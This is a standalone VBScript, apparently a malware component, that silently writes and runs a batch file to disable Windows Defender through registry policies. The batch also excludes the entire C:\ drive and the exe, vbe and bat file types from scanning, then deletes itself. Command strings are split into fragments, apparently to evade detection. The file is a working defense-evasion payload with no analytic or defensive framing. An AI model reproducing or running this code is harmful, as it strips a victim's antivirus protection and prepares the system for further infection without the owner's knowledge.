Option Explicit

Dim batFilePath, cleanupScript
batFilePath = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\tempLog.bat"
cleanupScript = "On Error Resume Next: CreateObject(""Scripting.FileSystemObject"").DeleteFile """ & batFilePath & """: On Error GoTo 0"

Sub CreateBatchFile(filePath)
    Dim fso, file
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set file = fso.CreateTextFile(filePath, True)

    file.WriteLine "@ec" & "ho off"
    file.WriteLine "cd /d %TEMP%"
    file.WriteLine "reg add ""HKLM\Software\Policies\Microsoft\Windows Defender"" /v ""DisableAntiSpyware"" /t REG_DWORD /d ""1"" /f"
    file.WriteLine "reg add ""HKLM\Software\Policies\Microsoft\Windows Defender"" /v ""DisableAntiVirus"" /t REG_DWORD /d ""1"" /f"
    file.WriteLine "reg add ""HKLM\Software\Microsoft\Windows Defender\Exclusions\Paths"" /v ""C:\\"" /t REG_SZ /d ""C:\\"" /f"
    file.WriteLine "reg add ""HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions"" /v ""exe"" /t REG_SZ /d ""exe"" /f"
    file.WriteLine "reg add ""HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions"" /v ""vbe"" /t REG_SZ /d ""vbe"" /f"
    file.WriteLine "reg add ""HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions"" /v ""bat"" /t REG_SZ /d ""bat"" /f"
    file.WriteLine "ex" & "it"
    file.Close
End Sub

Sub RunBatchFileSilently(filePath)
    Dim shell
    Set shell = CreateObject("WScript.Shell")
    shell.Run "cmd.ex" & "e /c """ & filePath & """", 0, True
End Sub

Function FileExists(file)
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    FileExists = fso.FileExists(file)
End Function

CreateBatchFile batFilePath
RunBatchFileSilently batFilePath

Do While FileExists(batFilePath)
    ExecuteGlobal cleanupScript
Loop
